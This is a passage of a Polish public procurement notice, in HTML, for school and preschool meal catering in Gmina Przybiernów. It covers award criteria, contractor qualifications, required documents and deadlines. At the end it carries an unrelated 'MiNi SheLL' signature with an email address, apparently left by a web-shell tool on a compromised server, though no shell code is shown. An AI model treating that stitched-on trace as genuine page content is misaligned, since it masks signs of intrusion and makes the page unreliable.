niepowodujące istotnych zmian w treści oferty - niezwłocznie zawiadamiając o tym<br/>wykonawcę, którego oferta została poprawiona. 19.9. W przypadku, o którym mowa w pkt 19.8 ppkt 3 SWZ, zamawiający wyznacza<br/>wykonawcy odpowiedni termin na wyrażenie zgody na poprawienie w ofercie omyłki lub zakwestionowanie jej poprawienia. Brak odpowiedzi w wyznaczonym terminie uznaje się za wyrażenie zgody na poprawienie omyłki.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Lokalizacja siedziby Wykonawcy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:<br/>7.2.1. Zdolności do występowania w obrocie gospodarczym<br/>Zamawiający nie stawia szczegółowych wymagań w zakresie spełniania tego warunku. Wykonawca potwierdza spełnienie<br/>warunku poprzez złożenie oświadczenia własnego, o którym mowa w rozdziale 9 SWZ.<br/>7.2.2. Uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych<br/>przepisów:<br/>Minimalny poziom zdolności:<br/>- zamawiający uzna, że wykonawca posiada wymagane przepisami prawa uprawnienia do prowadzenia działalności<br/>zawodowej jeżeli wykonawca wykaże, że:<br/>a) posiada odpis z właściwego rejestru stwierdzający status prawny Operatora Gastronomicznego lub zaświadczenie o<br/>wpisie do rejestru działalności gospodarczej, z którego będzie wynikał charakter prowadzonej działalności (tożsamy z<br/>przedmiotem zamówienia)- wystawiony nie wcześniej niż 6 miesięcy przed otwarciem ofert<br/>7.2.3. Sytuacji ekonomicznej lub finansowej;<br/>1) Zamawiający Minimalny poziom zdolności:<br/>- zamawiający uzna, że wykonawca znajduje się w sytuacji ekonomicznej i/lub finansowej zapewniającej należyte<br/>wykonanie zamówienia, jeżeli wykonawca wykaże, że:<br/>8a<br/>) jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem<br/>zamówienia na kwotę nie niższą niż 50 000,00 zł<br/>7.2.4. Zdolności technicznej lub zawodowej:<br/>1)W<br/>arunek zostanie uznany za spełniony, jeżeli Wykonawca: wykaże, że wykonał (a w przypadku świadczeń okresowych lub<br/>ciągłych również wykonuje) należycie w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres<br/>prowadzenia działalności jest krótszy – w tym okresie, minimum 1 usługę w zakresie przygotowywania i dostawy posiłków<br/>polegającą na przygotowaniu i dostawie posiłków dla dzieci w wieku przedszkolnym, uczniów szkół podstawowych lub<br/>gimnazjum, o wartości nie mniejszej niż: 100 000,00 zł brutto (usługi świadczone w ramach jednej umowy traktuje się jako<br/>jedną usługę );<br/>Wykonawca nie może sumować wartości kilku usług o mniejszym zakresie dla uzyskania wymaganych wartości<br/>porównywalnych<br/>2)<br/>skieruje do realizacji przedmiotu zamówienia minimum jedną osobę pełniącą funkcję kucharza:<br/>a) posiadającą wykształcenie min. średnie gastronomiczne, legitymującą się co najmniej 2-letnim doświadczeniem w<br/>przygotowaniu posiłków dla dzieci w wieku przedszkolnym, uczniów szkół podstawowych lub gimnazjum, bądź<br/>b) posiadającą wykształcenie zawodowe gastronomiczne, legitymującą się co najmniej 4-letnim doświadczeniem w<br/>przygotowaniu posiłków dla dzieci w wieku przedszkolnym, uczniów szkół podstawowych lub gimnazjum.<br/>7.3. Ocena spełniania w/w warunków dokonana zostanie zgodnie z formułą „spełnia / nie spełnia”, w oparciu o informacje zawarte w oświadczeniach i dokumentach złożonych przez Wykonawców, o których mowa w rozdziale 9 SWZ. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Do oferty Wykonawca<br/>zobowiązany jest dołączyć aktualne na dzień składania ofert:<br/>oświadczenia o braku podstaw do wykluczenia z postępowania– zgodnie z załącznikiem nr 8 do SWZ.<br/>9.2 Oświadczenia, o którym mowa w pkt 9.1 SWZ, potwierdzające brak podstaw do wykluczenia, spełnianie warunków udziału w<br/>postępowaniu odpowiednio na dzień składania ofert, tymczasowo zastępują wymagane przez Zamawiającego podmiotowe środki<br/>dowodowe.<br/>9.3 Zamawiający wzywa wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym<br/>niż 5 dni od dnia wezwania, podmiotowych środków dowodowych, aktualnych na ich dzień złożenia.<br/>Podmiotowe środki dowodowe wymagane od wykonawcy obejmują:<br/>Oświadczenie wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej, w<br/>rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2024 r. poz. 594 ze zm.), z innym<br/>wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo<br/>oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi<br/>przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego wykonawcy<br/>należącego do tej samej grupy kapitałowej – zgodnie z załącznikiem nr 2 do SWZ;</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Do<br/>oferty Wykonawca zobowiązany jest dołączyć aktualne na dzień składania ofert:<br/>oświadczenie o spełnianiu warunków udziału w postępowaniu- zgodnie z załącznikiem nr 7 do SWZ;<br/>9.2 Oświadczenia, o którym mowa w pkt 9.1 SWZ, potwierdzające brak podstaw do wykluczenia, spełnianie warunków udziału w<br/>postępowaniu odpowiednio na dzień składania ofert, tymczasowo zastępują wymagane przez Zamawiającego podmiotowe środki<br/>dowodowe.<br/>9.3 Zamawiający wzywa wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym<br/>niż 5 dni od dnia wezwania, podmiotowych środków dowodowych, aktualnych na ich dzień złożenia.<br/>Podmiotowe środki dowodowe wymagane od wykonawcy obejmują:<br/>1 Dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności<br/>związanej z przedmiotem zamówienia ze wskazaniem sumy gwarancyjnej tego ubezpieczenia;<br/>2 Odpis z rejestru stwierdzający status prawny Operatora Gastronomicznego lub zaświadczenie o wpisie do rejestru działalności<br/>gospodarczej, z którego będzie wynikał charakter prowadzonej działalności (tożsamy z przedmiotem zamówienia)- wystawiony nie<br/>wcześniej niż 6 miesięcy przed otwarciem ofert;<br/>3 Decyzja Inspektora Sanitarnego o spełnieniu wymogów na świadczenie usług będących przedmiotem zamówienia oraz stosowania<br/>norm HACCP;<br/>4 Wykaz usług wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych, w okresie ostatnich<br/>3 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i<br/>podmiotów, na rzecz których usługi zostały wykonane lub są wykonywane. Jeżeli Wykonawca powołuje się na doświadczenie w<br/>realizacji usług, wykonanych wspólnie z innymi wykonawcami informacje, o których mowa wyżej dotyczą usług faktycznie przez<br/>niego wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych - również faktycznie przez niego wykonywanych.<br/>Przedmiotowy wykaz należy złożyć w formularzu, którego wzór stanowi załącznik nr 3 do SWZ.<br/>5 Wykaz osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za<br/>świadczenie usług, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, wykształcenia niezbędnych do wykonania<br/>zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi<br/>osobami. Przedmiotowy wykaz należy złożyć w formularzu, którego wzór stanowi załącznik nr 4 do SWZ;<br/>6 Przykładowy jadłospis dekadowy.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> W terminie składania ofert określonym w pkt 16.1. SWZ wykonawca zobowiązany jest złożyć Zamawiającemu ofertę<br/>zawierającą:<br/>a) formularz oferty (sporządzony wg wzoru stanowiącego załącznik nr 1 do SWZ)<br/>b) oświadczenie o braku podstaw wykluczenia z postępowania: -zgodnie z załącznikiem nr 8 do SWZ<br/>c) oświadczenie o spełnianiu warunków zgodnie z załącznikiem nr 7 do SWZ<br/>d) zobowiązanie podmiotu udostępniającego zasoby do oddania Wykonawcy do dyspozycji niezbędnych zasobów na<br/>potrzeby realizacji zamówienia lub inny podmiotowy środek dowodowy potwierdzający, że Wykonawca realizując<br/>zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów, jeżeli Wykonawca wykazując spełnienie warunków<br/>udziału w postępowaniu polega na zdolnościach lub sytuacji innych podmiotów; (wzór zobowiązania do oddania wykonawcy<br/>do dyspozycji niezbędnych zasobów na potrzeby wykonania zamówienia stanowi załącznik nr 6 do SWZ),<br/>e) odpis lub informacja z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub<br/>innego właściwego rejestru w celu potwierdzenia, że osoba działająca w imieniu Wykonawcy jest umocowana do jego<br/>reprezentowania. Wykonawca nie jest zobowiązany do złożenia dokumentów, o których mowa w zdaniu poprzednim, jeżeli<br/>Zamawiający może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, o ile Wykonawca dostarczy dane<br/>umożliwiające dostęp do tych dokumentów,<br/>f) pełnomocnictwo lub inny dokument potwierdzający umocowanie do reprezentowania Wykonawcy, jeżeli w imieniu<br/>Wykonawcy działa osoba, której umocowanie do jego reprezentowania nie wynika z dokumentów, o których mowa w pkt<br/>15.5. SWZ, sporządzone pod rygorem nieważności, w formie elektronicznej lub postaci elektronicznej opatrzonej podpisem<br/>zaufanym lub podpisem osobistym lub kwalifikowanym podpisem elektronicznym.<br/>g) pełnomocnictwo lub inny dokument potwierdzający umocowanie dla pełnomocnika ustanowionego przez Wykonawców<br/>wspólnie ubiegających się o udzielenie zamówienia do reprezentowania ich w postępowaniu albo do reprezentowania w<br/>postępowaniu i zawarcia<br/>16<br/>umowy w sprawie zamówienia publicznego, jeżeli ofertę składają Wykonawcy wspólnie ubiegający się o udzielenie<br/>zamówienia, sporządzone pod rygorem nieważności, w formie elektronicznej lub postaci elektronicznej opatrzonej podpisem<br/>zaufanym lub podpisem osobistym lub kwalifikowanym podpisem elektronicznym<br/>h) dokumenty, o których mowa wyżej w pkt 15.4. lit f) i g) SWZ dla osoby działającej w imieniu podmiotu udostępniającego<br/>Wykonawcy zasoby na zasadach określonych w art. 118 Pzp, <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> W przypadku składania oferty przez Wykonawców wspólnie ubiegających się o zamówienie w formularzu ofertowym należy<br/>wymienić dane wszystkich Wykonawców występujących wspólnie ze wskazaniem pełnomocnika do ich reprezentowania i<br/>załączeniem pełnomocnictwa, o którym mowa w pkt 15.5.<br/>15.15.<br/>Pełnomocnik pozostaje w kontakcie z Zamawiającym w toku postępowania i do niego Zamawiający kieruje informacje,<br/>korespondencję, itp.<br/>15.16.<br/>Oferta oraz pozostałe oświadczenia i dokumenty, dla których Zamawiający określił wzory w formie formularzy<br/>zamieszczonych w załącznikach do SWZ, powinny być sporządzone zgodnie z tymi wzorami, co do treści oraz opisu kolumn<br/>i wierszy.<br/>15.17.<br/>Przed podpisaniem umowy (w przypadku wygrania postępowania) Wykonawcy składający ofertę wspólną będą mieli<br/>obowiązek przedstawić Zamawiającemu umowę konsorcjum, zawierającą, co najmniej:<br/>a) zobowiązanie do realizacji wspólnego przedsięwzięcia gospodarczego obejmującego swoim zakresem realizację<br/>przedmiotu zamówienia,<br/>b) określenie zakresu działania poszczególnych stron umowy,<br/>c) czas obowiązywania umowy, który nie może być krótszy, niż okres obejmujący realizację zamówienia oraz czas trwania<br/>gwarancji jakości i rękojmi. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia zostały określone w projektowanych postanowieniach<br/>umowy, które stanowią załącznik nr 5 do SWZ <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-08-11 10:30</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę należy złożyć za pośrednictwem Platformy Przetargowej Gminy Przybiernów https://przybiernow.logintrade.net/rejestracja/ustawowe.html</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-08-11 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Zamawiający na podstawie art. 95 ustawy Prawo zamówień publicznych wymaga zatrudnienia przez Wykonawcę lub<br/>podwykonawcę na podstawie umowy o pracę osób wykonujących czynności w zakresie realizacji zamówienia, jeżeli<br/>wykonanie tych czynności polega na wykonywaniu pracy w sposób określony w art. 22 § 1 ustawy z dnia 26 czerwca 1974 r.<br/>Kodeks pracy (t.j. Dz. U. z 2023 r. poz. 1465 ze zm.).<br/>25.2. Zamawiający wymaga zatrudnienia na podstawie umowy o pracę przez Wykonawcę lub Podwykonawcę osób<br/>wykonujących wskazane poniżej czynności w trakcie realizacji zamówienia :<br/>kucharz<br/>12.3. Z postępowania o udzielenie zamówienia wyklucza się Wykonawcę w przypadkach, o których mowa w art. 7 ust. 1<br/>ustawy z dnia 13 kwietnia 2022r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę<br/>oraz służących ochronie bezpieczeństwa narodowego

Creat By MiNi SheLL
Email: jattceo@gmail.com